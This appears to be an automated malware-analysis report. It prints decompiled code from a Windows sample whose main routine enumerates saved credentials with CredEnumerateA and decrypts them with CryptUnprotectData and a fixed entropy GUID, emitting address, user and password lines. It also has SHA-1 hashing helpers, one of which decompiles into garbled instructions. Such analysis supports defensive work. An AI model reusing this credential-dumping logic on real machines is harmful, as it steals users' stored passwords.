                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				intOrPtr _v117;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t81;
                                    				void* _t86;
                                    				intOrPtr _t121;
                                    				void* _t160;
                                    				void* _t175;
                                    				void* _t187;
                                    				void* _t189;
                                    				short* _t191;
                                    				intOrPtr _t198;
                                    				intOrPtr _t203;
                                    				void* _t226;
                                    				void* _t233;
                                    				signed int _t234;
                                    				void* _t236;
                                    				intOrPtr* _t238;
                                    				intOrPtr _t240;
                                    				intOrPtr _t241;
                                    
                                    				_t174 = __ebx;
                                    				_v117 = _v117 + __edx;
                                    				_t240 = _t241;
                                    				_t175 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t175 = _t175 - 1;
                                    				} while (_t175 != 0);
                                    				_push(_t175);
                                    				_push(__ebx);
                                    				_t236 = __eax;
                                    				_push(_t240);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t241;
                                    				E00401AC0(__eax);
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");
                                    				_t238 = _t236;
                                    				_t233 = 0x25;
                                    				_t81 =  &_v151;
                                    				_t191 =  &_v114;
                                    				do {
                                    					 *_t191 = 0 << 2;
                                    					_t191 = _t191 + 2;
                                    					_t81 = _t81 + 1;
                                    					_t233 = _t233 - 1;
                                    				} while (_t233 != 0);
                                    				_v32 =  &_v114;
                                    				_v36 = 0x4a;
                                    				_push( &_v8);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				L004086E8();
                                    				_t86 = _v12 - 1;
                                    				if(_t86 >= 0) {
                                    					_v40 = _t86 + 1;
                                    					_t234 = 0;
                                    					do {
                                    						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));
                                    						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t121 + 0x18));
                                    						_push( &_v28);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v36);
                                    						_push(0);
                                    						_push( &_v20);
                                    						L004086F0();
                                    						_push( *_t238);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t174 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t238);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
                                    						_pop(_t187);
                                    						E0040234C(_v180, _t187, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t238);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t160 = E00402274(_v204);
                                    						_push(_t160 - _t222);
                                    						E00402218( &_v208, _t174);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t174);
                                    						_pop(_t226);
                                    						_pop(_t189);
                                    						E0040234C(_v212, _t189, _t226, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v184);
                                    						_t234 = _t234 + 1;
                                    						_t60 =  &_v40;
                                    						 *_t60 = _v40 - 1;
                                    						_t249 =  *_t60;
                                    					} while ( *_t60 != 0);
                                    				}
                                    				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
                                    				E00401B14(_t238, _v216);
                                    				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
                                    				E00401B14(_t238, _v220);
                                    				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
                                    				E00401B14(_t238, _v224);
                                    				_pop(_t198);
                                    				 *[fs:eax] = _t198;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t203 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t203);
                                    			}

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t79;
                                    				void* _t84;
                                    				intOrPtr _t119;
                                    				void* _t158;
                                    				void* _t173;
                                    				void* _t185;
                                    				void* _t187;
                                    				short* _t188;
                                    				intOrPtr _t195;
                                    				intOrPtr _t200;
                                    				void* _t223;
                                    				void* _t230;
                                    				signed int _t231;
                                    				void* _t233;
                                    				intOrPtr* _t235;
                                    				intOrPtr _t237;
                                    				intOrPtr _t238;
                                    
                                    				_t172 = __ebx;
                                    				_t237 = _t238;
                                    				_t173 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t173 = _t173 - 1;
                                    				} while (_t173 != 0);
                                    				_push(_t173);
                                    				_push(__ebx);
                                    				_t233 = __eax;
                                    				_push(_t237);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t238;
                                    				E00401AC0(__eax);
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");
                                    				_t235 = _t233;
                                    				_t230 = 0x25;
                                    				_t79 =  &_v151;
                                    				_t188 =  &_v114;
                                    				do {
                                    					 *_t188 = 0 << 2;
                                    					_t188 = _t188 + 2;
                                    					_t79 = _t79 + 1;
                                    					_t230 = _t230 - 1;
                                    				} while (_t230 != 0);
                                    				_v32 =  &_v114;
                                    				_v36 = 0x4a;
                                    				_push( &_v8);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				L004086E8();
                                    				_t84 = _v12 - 1;
                                    				if(_t84 >= 0) {
                                    					_v40 = _t84 + 1;
                                    					_t231 = 0;
                                    					do {
                                    						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
                                    						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t119 + 0x18));
                                    						_push( &_v28);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v36);
                                    						_push(0);
                                    						_push( &_v20);
                                    						L004086F0();
                                    						_push( *_t235);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t172 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t235);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
                                    						_pop(_t185);
                                    						E0040234C(_v180, _t185, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t235);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t158 = E00402274(_v204);
                                    						_push(_t158 - _t219);
                                    						E00402218( &_v208, _t172);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t172);
                                    						_pop(_t223);
                                    						_pop(_t187);
                                    						E0040234C(_v212, _t187, _t223, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v184);
                                    						_t231 = _t231 + 1;
                                    						_t58 =  &_v40;
                                    						 *_t58 = _v40 - 1;
                                    						_t245 =  *_t58;
                                    					} while ( *_t58 != 0);
                                    				}
                                    				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
                                    				E00401B14(_t235, _v216);
                                    				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
                                    				E00401B14(_t235, _v220);
                                    				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
                                    				E00401B14(_t235, _v224);
                                    				_pop(_t195);
                                    				 *[fs:eax] = _t195;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t200 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t200);
                                    			}

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 57%
                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				signed char _t43;
                                    				long* _t50;
                                    				intOrPtr _t66;
                                    				intOrPtr _t71;
                                    				void* _t76;
                                    				void* _t94;
                                    				intOrPtr _t103;
                                    				intOrPtr _t104;
                                    				signed char _t112;
                                    				void* _t113;
                                    				signed int _t115;
                                    				void* _t116;
                                    				char* _t117;
                                    				void* _t119;
                                    
                                    				asm("adc [edx], eax");
                                    				_t43 =  *__eax ^  *[cs:ecx];
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *__ecx =  *__ecx + __edx;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				asm("adc [eax], al");
                                    				_t115 = __esi | _a73;
                                    				_t117 =  &_a1;
                                    				asm("aaa");
                                    				_pop(_t111);
                                    				asm("arpl [gs:edi+0x64], bp");
                                    				_push(_t117);
                                    				_push(_t117);
                                    				_push(_t115);
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t116 = __edx;
                                    				_t112 = _t43;
                                    				_push(_t119);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t119 + 0xffffffd8;
                                    				_t94 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004);
                                    				_t50 = _v8;
                                    				_push(_t50);
                                    				L00408978();
                                    				if(_t50 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t112);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
                                    					_push(_t112);
                                    					_t66 = _v12;
                                    					_push(_t66);
                                    					L00408980();
                                    					if(_t66 != 0) {
                                    						_v20 = 0x14;
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2);
                                    						_t71 = _v12;
                                    						_push(_t71);
                                    						L00408970();
                                    						if(_t71 != 0) {
                                    							_push(_v12);
                                    							L00408988();
                                    							CryptReleaseContext(_v8, 0);
                                    							_t76 = _v20 - 1;
                                    							if(_t76 >= 0) {
                                    								_v24 = _t76 + 1;
                                    								_t113 = 0;
                                    								do {
                                    									_t94 = _t94 +  *(_v16 + _t113);
                                    									_v40 =  *(_v16 + _t113) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
                                    									E00401D58(_t116, _v32);
                                    									_t113 = _t113 + 1;
                                    									_t30 =  &_v24;
                                    									 *_t30 = _v24 - 1;
                                    								} while ( *_t30 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
                                    							E00401D58(_t116, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t103);
                                    				 *[fs:eax] = _t103;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t104 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t104);
                                    			}
                                    0x00408ad8
                                    0x00408ada
                                    0x00408add
                                    0x00408adf
                                    0x00408ae1
                                    0x00408ae3
                                    0x00408ae5
                                    0x00408ae7
                                    0x00408ae9
                                    0x00408aec
                                    0x00408aef
                                    0x00408af0
                                    0x00408af1
                                    0x00408af2
                                    0x00408af7
                                    0x00408af8
                                    0x00408aff
                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				long* _t47;
                                    				intOrPtr _t63;
                                    				intOrPtr _t68;
                                    				void* _t73;
                                    				void* _t91;
                                    				intOrPtr _t99;
                                    				intOrPtr _t100;
                                    				void* _t108;
                                    				void* _t109;
                                    				void* _t111;
                                    				void* _t114;
                                    
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t111 = __edx;
                                    				_t108 = __eax;
                                    				_push(_t114);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t114 + 0xffffffd8;
                                    				_t91 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004);
                                    				_t47 = _v8;
                                    				_push(_t47);
                                    				L00408978();
                                    				if(_t47 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t108);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
                                    					_push(_t108);
                                    					_t63 = _v12;
                                    					_push(_t63);
                                    					L00408980();
                                    					if(_t63 != 0) {
                                    						_v20 = 0x14;
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2);
                                    						_t68 = _v12;
                                    						_push(_t68);
                                    						L00408970();
                                    						if(_t68 != 0) {
                                    							_push(_v12);
                                    							L00408988();
                                    							CryptReleaseContext(_v8, 0);
                                    							_t73 = _v20 - 1;
                                    							if(_t73 >= 0) {
                                    								_v24 = _t73 + 1;
                                    								_t109 = 0;
                                    								do {
                                    									_t91 = _t91 +  *(_v16 + _t109);
                                    									_v40 =  *(_v16 + _t109) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32);
                                    									E00401D58(_t111, _v32);
                                    									_t109 = _t109 + 1;
                                    									_t29 =  &_v24;
                                    									 *_t29 = _v24 - 1;
                                    								} while ( *_t29 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
                                    							E00401D58(_t111, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t99);
                                    				 *[fs:eax] = _t99;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t100 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t100);
                                    			}
                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
